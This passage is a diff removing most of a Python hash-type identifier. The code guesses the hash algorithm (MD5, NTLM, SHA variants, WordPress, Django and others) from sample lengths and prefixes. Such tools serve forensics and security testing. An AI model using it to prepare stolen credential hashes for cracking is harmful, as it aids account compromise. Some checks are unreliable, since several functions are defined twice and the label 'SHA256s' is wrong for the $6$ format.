"115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - -# hash.islower() minusculas -# hash.isdigit() numerico -# hash.isalpha() letras -# hash.isalnum() alfanumerico - -def CRC16(hash): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") -def CRC16CCITT(hash): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") -def FCS16(hash): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - -def CRC32(hash): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") -def ADLER32(hash): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") -def CRC32B(hash): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") -def XOR32(hash): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - -def GHash323(hash): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") -def GHash325(hash): - hs='85318985' - if len(hash)==len(hs) and 
hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True:
- jerar.append("103020")
-
-def DESUnix(hash):
- hs='ZiY8YtDKXJwYQ'
- if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False:
- jerar.append("104020")
-
-def MD5Half(hash):
- hs='ae11fd697ec92c7c'
- if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
- jerar.append("105060")
-def MD5Middle(hash):
- hs='7ec92c7c98de3fac'
- if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
- jerar.append("105040")
-def MySQL(hash):
- hs='63cea4673fd25f46'
- if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
- jerar.append("105020")
-
-def DomainCachedCredentials(hash):
- hs='f42005ec1afe77967cbc83dce1b4d714'
- if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
- jerar.append("106025")
-def Haval128(hash):
- hs='d6e3ec49aa0f138a619f27609022df10'
- if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
- jerar.append("106160")
-def Haval128HMAC(hash):
- hs='3ce8b0ffd75bc240fc7d967729cd6637'
- if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
- jerar.append("106165")
-def MD2(hash):
- hs='08bbef4754d98806c373f2cd7d9a43c4'
- if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
- jerar.append("106060")
-def MD2HMAC(hash):
- hs='4b61b72ead2b0eb0fa3b8a56556a6dca'
- if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
- jerar.append("106120")
-def MD4(hash):
- hs='a2acde400e61410e79dacbdfc3413151'
- if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
- jerar.append("106040")
-def MD4HMAC(hash):
- hs='6be20b66f2211fe937294c1c95d1cd4f'
- if len(hash)==len(hs) and 
hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") -def MD5(hash): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") -def MD5HMAC(hash): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") -def MD5HMACWordpress(hash): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") -def NTLM(hash): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") -def RAdminv2x(hash): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") -def RipeMD128(hash): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") -def RipeMD128HMAC(hash): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") -def SNEFRU128(hash): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") -def SNEFRU128HMAC(hash): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") -def Tiger128(hash): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") -def 
Tiger128HMAC(hash): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") -def md5passsalt(hash): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") -def md5saltmd5pass(hash): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") -def md5saltpass(hash): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") -def md5saltpasssalt(hash): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") -def md5saltpassusername(hash): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") -def md5saltmd5pass(hash): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") -def md5saltmd5passsalt(hash): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") -def md5saltmd5passsalt(hash): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") -def md5saltmd5saltpass(hash): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") -def md5saltmd5md5passsalt(hash): - 
hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") -def md5username0pass(hash): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") -def md5usernameLFpass(hash): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") -def md5usernamemd5passsalt(hash): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") -def md5md5pass(hash): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") -def md5md5passsalt(hash): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") -def md5md5passmd5salt(hash): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") -def md5md5saltpass(hash): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") -def md5md5saltmd5pass(hash): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") -def md5md5usernamepasssalt(hash): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") -def md5md5md5pass(hash): - hs='ea086739755920e732d0f4d8c1b6ad8d' 
- if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") -def md5md5md5md5pass(hash): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") -def md5md5md5md5md5pass(hash): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") -def md5sha1pass(hash): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") -def md5sha1md5pass(hash): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") -def md5sha1md5sha1pass(hash): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") -def md5strtouppermd5pass(hash): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - -def LineageIIC4(hash): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") -def MD5phpBB3(hash): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") -def MD5Unix(hash): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") -def MD5Wordpress(hash): - 
hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - -def MD5APR(hash): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - -def Haval160(hash): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") -def Haval160HMAC(hash): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") -def MySQL5(hash): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") -def MySQL160bit(hash): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") -def RipeMD160(hash): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") -def RipeMD160HMAC(hash): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") -def SHA1(hash): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") -def SHA1HMAC(hash): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - 
jerar.append("109140") -def SHA1MaNGOS(hash): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") -def SHA1MaNGOS2(hash): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") -def Tiger160(hash): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") -def Tiger160HMAC(hash): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") -def sha1passsalt(hash): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") -def sha1saltpass(hash): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") -def sha1saltmd5pass(hash): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") -def sha1saltmd5passsalt(hash): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") -def sha1saltsha1pass(hash): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") -def sha1saltsha1saltsha1pass(hash): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and 
hash.isalnum()==True: - jerar.append("109360") -def sha1usernamepass(hash): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") -def sha1usernamepasssalt(hash): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") -def sha1md5pass(hash): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") -def sha1md5passsalt(hash): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") -def sha1md5sha1pass(hash): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") -def sha1sha1pass(hash): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") -def sha1sha1passsalt(hash): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") -def sha1sha1passsubstrpass03(hash): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") -def sha1sha1saltpass(hash): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") -def sha1sha1sha1pass(hash): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and 
hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") -def sha1strtolowerusernamepass(hash): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - -def Haval192(hash): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") -def Haval192HMAC(hash): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") -def Tiger192(hash): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") -def Tiger192HMAC(hash): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - -def MD5passsaltjoomla1(hash): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - -def SHA1Django(hash): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - -def Haval224(hash): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") -def Haval224HMAC(hash): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and 
hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") -def SHA224(hash): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") -def SHA224HMAC(hash): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - -def SHA256(hash): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") -def SHA256HMAC(hash): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") -def Haval256(hash): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") -def Haval256HMAC(hash): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") -def GOSTR341194(hash): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") -def RipeMD256(hash): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") -def RipeMD256HMAC(hash): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and 
hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") -def SNEFRU256(hash): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") -def SNEFRU256HMAC(hash): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") -def SHA256md5pass(hash): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") -def SHA256sha1pass(hash): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - -def MD5passsaltjoomla2(hash): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") -def SAM(hash): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - -def SHA256Django(hash): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - -def RipeMD320(hash): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - 
jerar.append("118020") -def RipeMD320HMAC(hash): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - -def SHA384(hash): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") -def SHA384HMAC(hash): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - -def SHA256s(hash): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - -def SHA384Django(hash): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - jerar.append("121020") - -def SHA512(hash): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") -def SHA512HMAC(hash): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") -def Whirlpool(hash): - 
hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") -def WhirlpoolHMAC(hash): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - -print(logo) -try: - first = str(argv[1]) -except: - first = None - -while True: - try: - jerar=[] - print("-"*50) - if first: - h = first - else: - h = input(" HASH: ") - - ADLER32(h); CRC16(h); CRC16CCITT(h); CRC32(h); CRC32B(h); DESUnix(h); DomainCachedCredentials(h); FCS16(h); GHash323(h); GHash325(h); GOSTR341194(h); Haval128(h); Haval128HMAC(h); Haval160(h); Haval160HMAC(h); Haval192(h); Haval192HMAC(h); Haval224(h); Haval224HMAC(h); Haval256(h); Haval256HMAC(h); LineageIIC4(h); MD2(h); MD2HMAC(h); MD4(h); MD4HMAC(h); MD5(h); MD5APR(h); MD5HMAC(h); MD5HMACWordpress(h); MD5phpBB3(h); MD5Unix(h); MD5Wordpress(h); MD5Half(h); MD5Middle(h); MD5passsaltjoomla1(h); MD5passsaltjoomla2(h); MySQL(h); MySQL5(h); MySQL160bit(h); NTLM(h); RAdminv2x(h); RipeMD128(h); RipeMD128HMAC(h); RipeMD160(h); RipeMD160HMAC(h); RipeMD256(h); RipeMD256HMAC(h); RipeMD320(h); RipeMD320HMAC(h); SAM(h); SHA1(h); SHA1Django(h); SHA1HMAC(h); SHA1MaNGOS(h); SHA1MaNGOS2(h); SHA224(h); SHA224HMAC(h); SHA256(h); SHA256s(h); SHA256Django(h); SHA256HMAC(h); SHA256md5pass(h); SHA256sha1pass(h); SHA384(h); SHA384Django(h); SHA384HMAC(h); SHA512(h); SHA512HMAC(h); SNEFRU128(h); SNEFRU128HMAC(h); SNEFRU256(h); SNEFRU256HMAC(h); Tiger128(h); Tiger128HMAC(h); Tiger160(h); Tiger160HMAC(h); Tiger192(h); Tiger192HMAC(h); Whirlpool(h); WhirlpoolHMAC(h); XOR32(h); md5passsalt(h); md5saltmd5pass(h); md5saltpass(h); md5saltpasssalt(h); md5saltpassusername(h); 
